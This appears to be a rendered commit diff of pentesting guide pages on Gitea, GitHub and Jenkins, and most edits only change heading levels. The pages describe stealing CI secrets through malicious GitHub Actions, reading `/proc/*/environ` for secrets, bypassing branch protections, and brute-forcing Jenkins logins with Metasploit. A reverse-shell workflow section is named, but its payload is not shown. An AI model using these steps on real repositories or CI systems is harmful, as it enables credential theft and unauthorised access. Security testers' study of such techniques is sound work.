If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Basic Gitea Information # Basic Structure
## Basic Structure
The basic gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. The basic gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
@ -29,9 +27,9 @@ A user may also be **part of different teams** with different permissions over d
And finally **repositories may have special protection mechanisms**. And finally **repositories may have special protection mechanisms**.
## Permissions # Permissions
### Organizations ## Organizations
When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
@ -53,7 +51,7 @@ When creating a new team, several important settings are selected:
![](<../../.gitbook/assets/image (648) (1).png>) ![](<../../.gitbook/assets/image (648) (1).png>)
### Teams & Users ## Teams & Users
In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
@ -61,35 +59,35 @@ In a repo, the **org admin** and the **repo admins** (if allowed by the org) can
* Write * Write
* Read * Read
## Gitea Authentication # Gitea Authentication
### Web Access ## Web Access
Using **username + password** and potentially (and recommended) a 2FA. Using **username + password** and potentially (and recommended) a 2FA.
### **SSH Keys** ## **SSH Keys**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
#### **GPG Keys** ### **GPG Keys**
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
### **Personal Access Tokens** ## **Personal Access Tokens**
You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
### Oauth Applications ## Oauth Applications
Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
![](<../../.gitbook/assets/image (662).png>) ![](<../../.gitbook/assets/image (662).png>)
### Deploy keys ## Deploy keys
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
## Branch Protections # Branch Protections
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.

View file

@ -17,19 +17,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Github Security # What is Github
## What is Github
(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. (From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
### Basic Information ## Basic Information
{% content-ref url="basic-github-information.md" %} {% content-ref url="basic-github-information.md" %}
[basic-github-information.md](basic-github-information.md) [basic-github-information.md](basic-github-information.md)
{% endcontent-ref %} {% endcontent-ref %}
## External Recon # External Recon
Github repositories can be configured as public, private and internal. Github repositories can be configured as public, private and internal.
@ -39,7 +37,7 @@ Github repositories can be configured as public, private and internal.
In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
### Github Dorks ## Github Dorks
Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
@ -49,7 +47,7 @@ Tools (each tool contains its list of dorks):
* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) * [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) * [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
### Github Leaks ## Github Leaks
Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
@ -63,11 +61,11 @@ Tools (each tool contains its list of regexes):
* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks) * [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) * [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
## Internal Recon & Attacks # Internal Recon & Attacks
For this scenario we are going to suppose that you have obtained some access to a github account. For this scenario we are going to suppose that you have obtained some access to a github account.
### With User Credentials ## With User Credentials
If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
@ -79,7 +77,7 @@ Note that if you **manage to steal the `user_session` cookie** (currently config
Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
### With User SSH Key ## With User SSH Key
Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
@ -95,7 +93,7 @@ If the user has configured its username as his github username you can access th
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. **SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
#### GPG Keys ### GPG Keys
As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered.
@ -105,7 +103,7 @@ Check locally if the current user has any key with:
gpg --list-secret-keys --keyid-format=long gpg --list-secret-keys --keyid-format=long
``` ```
### With User Token ## With User Token
For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
@ -113,7 +111,7 @@ A user token can be used **instead of a password** for Git over HTTPS, or can be
A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
### With Oauth Application ## With Oauth Application
For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
@ -123,7 +121,7 @@ These are the [scopes an Oauth application can request](https://docs.github.com/
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
### With Github Application ## With Github Application
For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
@ -131,7 +129,7 @@ An attacker might create a **malicious Github Application** to access privileged
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
### Enumerate Webhooks ## Enumerate Webhooks
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ **Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
@ -139,17 +137,17 @@ But in some occasions, people instead of setting the **secret** in its place, th
Webhooks can be set at **repo and at org level**. Webhooks can be set at **repo and at org level**.
### With Malicious Github Action ## With Malicious Github Action
For an introduction about [**Github Actions check the basic information**](basic-github-information.md#git-actions). For an introduction about [**Github Actions check the basic information**](basic-github-information.md#git-actions).
In case you can **execute arbitrary github actions** in a **repository**, you can **steal the secrets from that repo**. In case you can **execute arbitrary github actions** in a **repository**, you can **steal the secrets from that repo**.
#### Github Action Execution from Repo Creation ### Github Action Execution from Repo Creation
In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
#### Github Action from a New Branch ### Github Action from a New Branch
If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
@ -168,7 +166,7 @@ on:
# Use '**' instead of a branh name to trigger the action in all the cranches # Use '**' instead of a branh name to trigger the action in all the cranches
``` ```
#### Github Action Injection/Backdoor ### Github Action Injection/Backdoor
In case you somehow managed to **infiltrate inside a Github Action**, if you can escalate privileges you can **steal secrets from the processes where secrets have been set in**. In some cases you don't even need to escalate privileges. In case you somehow managed to **infiltrate inside a Github Action**, if you can escalate privileges you can **steal secrets from the processes where secrets have been set in**. In some cases you don't even need to escalate privileges.
@ -177,7 +175,7 @@ cat /proc/<proc_number>/environ
cat /proc/*/environ | grep -i secret #Suposing the env variable name contains "secret" cat /proc/*/environ | grep -i secret #Suposing the env variable name contains "secret"
``` ```
#### GITHUB\_TOKEN ### GITHUB\_TOKEN
This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given by default read and **write permissions** **to the repo**. This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given by default read and **write permissions** **to the repo**. This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
@ -217,7 +215,7 @@ curl -X POST \
Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
{% endhint %} {% endhint %}
#### List secrets in Github Action output ### List secrets in Github Action output
```yaml ```yaml
name: list_env name: list_env
@ -241,7 +239,7 @@ jobs:
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
``` ```
#### Get reverse shell with secrets ### Get reverse shell with secrets
```yaml ```yaml
name: revshell name: revshell
@ -264,7 +262,7 @@ jobs:
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
``` ```
### Branch Protection Bypass ## Branch Protection Bypass
* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way. * **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
* _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ * _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
@ -278,7 +276,7 @@ jobs:
* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). * **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
* If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
### Bypass Environments Protections ## Bypass Environments Protections
For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
@ -294,7 +292,7 @@ Note, that you might find the edge case where **all the branches are protected**
Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
## Persistence # Persistence
* Generate **user token** * Generate **user token**
* Steal **github tokens** from **secrets** * Steal **github tokens** from **secrets**

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Basic Github Information # Basic Structure
## Basic Structure
The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**. The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
@ -29,14 +27,14 @@ Moreover, a user may be **part of different teams** with different enterprise, o
And finally **repositories may have special protection mechanisms**. And finally **repositories may have special protection mechanisms**.
## Privileges # Privileges
### Enterprise Roles ## Enterprise Roles
* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository * **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**. * **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
### Organization Roles ## Organization Roles
In an organisation users can have different roles: In an organisation users can have different roles:
@ -50,7 +48,7 @@ In an organisation users can have different roles:
You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
### Members Privileges ## Members Privileges
In _https://github.com/organizations/\<org\_name>/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**. In _https://github.com/organizations/\<org\_name>/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**.
@ -64,7 +62,7 @@ The settings here configured will indicate the following permissions of members
* The permissions admins has over the repositories * The permissions admins has over the repositories
* If members can create new teams * If members can create new teams
### Repository Roles ## Repository Roles
By default repository roles are created: By default repository roles are created:
@ -78,39 +76,39 @@ You can **compare the permissions** of each role in this table [https://docs.git
You can also **create your own roles** in _https://github.com/organizations/\<org\_name>/settings/roles_ You can also **create your own roles** in _https://github.com/organizations/\<org\_name>/settings/roles_
### Teams ## Teams
You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team. You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
![](<../../.gitbook/assets/image (630) (1).png>) ![](<../../.gitbook/assets/image (630) (1).png>)
### Users ## Users
The users of an organization can be **listed** in _https://github.com/orgs/\<org\_name>/people._ The users of an organization can be **listed** in _https://github.com/orgs/\<org\_name>/people._
In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
## Github Authentication # Github Authentication
Github offers different ways to authenticate to your account and perform actions on your behalf. Github offers different ways to authenticate to your account and perform actions on your behalf.
### Web Access ## Web Access
Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**). Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
### **SSH Keys** ## **SSH Keys**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys) You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
#### **GPG Keys** ### **GPG Keys**
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
### **Personal Access Tokens** ## **Personal Access Tokens**
You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens) You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
### Oauth Applications ## Oauth Applications
Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
@ -127,7 +125,7 @@ Some **security recommendations**:
* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. * **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). * **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
### Github Applications ## Github Applications
Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
@ -149,19 +147,19 @@ Some security recommendations:
* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." * If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). * **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
### Deploy keys ## Deploy keys
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
### Github Actions ## Github Actions
This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information. This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
## Git Actions # Git Actions
Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets). Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
### Configuration ## Configuration
In _https://github.com/organizations/\<org\_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. In _https://github.com/organizations/\<org\_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
@ -169,7 +167,7 @@ It's possible to disallow the use of github actions completely, **allow all gith
It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the \_GITHUB\_TOKEN**\_\*\* of a Github Action when it's run\*\*. It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the \_GITHUB\_TOKEN**\_\*\* of a Github Action when it's run\*\*.
### Git Secrets ## Git Secrets
Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**. Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
@ -184,7 +182,7 @@ steps:
super_secret: ${{ secrets.SuperSecret }} super_secret: ${{ secrets.SuperSecret }}
``` ```
#### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a> ### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a>
```yaml ```yaml
steps: steps:
@ -203,7 +201,7 @@ Once configured in the repo or the organizations **users of github won't be able
Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action). Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
### Git Environments ## Git Environments
Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like: Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
@ -216,7 +214,7 @@ jobs:
You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it. You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.
### Git Action Box ## Git Action Box
A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
@ -230,7 +228,7 @@ It's **not possible to run a Github Action of an organization inside a self host
If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with. If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with.
### Git Action Compromise ## Git Action Compromise
If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed. If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
@ -242,7 +240,7 @@ A **malicious Github Action** run could be **abused** by the attacker to:
* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. * **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
{% endhint %} {% endhint %}
## Branch Protections # Branch Protections
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
@ -271,7 +269,7 @@ Different protections can be applied to a branch (like to master):
As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
{% endhint %} {% endhint %}
## References # References
* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) * [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization)
* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise) * [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)

View file

@ -17,14 +17,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Jenkins # Basic Information
## Basic Information
Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesnt eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\ Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesnt eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\
Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html). Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html).
## Unauthenticated Enumeration # Unauthenticated Enumeration
In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
@ -44,12 +42,12 @@ You may be able to get the Jenkins version from the path _**/oops**_ or _**/erro
![](<../.gitbook/assets/image (415).png>) ![](<../.gitbook/assets/image (415).png>)
## Login # Login
You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\ You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\
Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
### Bruteforce ## Bruteforce
**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords). **Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords).
@ -57,33 +55,33 @@ Also if **SSO** **functionality**/**plugins** were present then you should attem
msf> use auxiliary/scanner/http/jenkins_login msf> use auxiliary/scanner/http/jenkins_login
``` ```
## Jenkins Abuses # Jenkins Abuses
### Known Vulnerabilities ## Known Vulnerabilities
